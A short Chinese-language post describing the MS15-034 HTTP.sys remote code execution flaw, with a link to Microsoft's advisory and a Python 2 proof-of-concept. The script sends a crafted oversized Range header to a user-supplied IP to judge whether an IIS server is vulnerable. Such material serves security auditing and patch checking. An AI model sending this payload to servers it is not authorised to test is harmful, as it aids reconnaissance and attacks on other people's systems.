遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。
官方文檔:https://technet.microsoft.com/zh-cn/library/security/MS15-034
POC(python2):
1 #!/usr/bin/env python 2 #-*-coding:utf-8-*- 3 4 import socket 5 import random 6 7 ipAddr = raw_input("Please set your target:") 8 hexAllFfff = "18446744073709551615" 9 req1 = "GET / HTTP/1.0\r\n\r\n" 10 req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" 11 12 print "[*] Audit Started" 13 14 try: 15 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 client_socket.connect((ipAddr, 80)) 17 client_socket.send(req1) 18 boringResp = client_socket.recv(1024) 19 if "Microsoft" not in boringResp: 20 print "[*] Not IIS" 21 exit(0) 22 client_socket.close() 23 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 client_socket.connect((ipAddr, 80)) 25 client_socket.send(req) 26 goodResp = client_socket.recv(1024) 27 if "Requested Range Not Satisfiable" in goodResp: 28 print "[!!] Looks VULN" 29 elif " The request has an invalid header name" in goodResp: 30 print "[*] Looks Patched" 31 else: 32 print "[*] Unexpected response, cannot discern patch status" 33 34 except Exception,e: 35 print e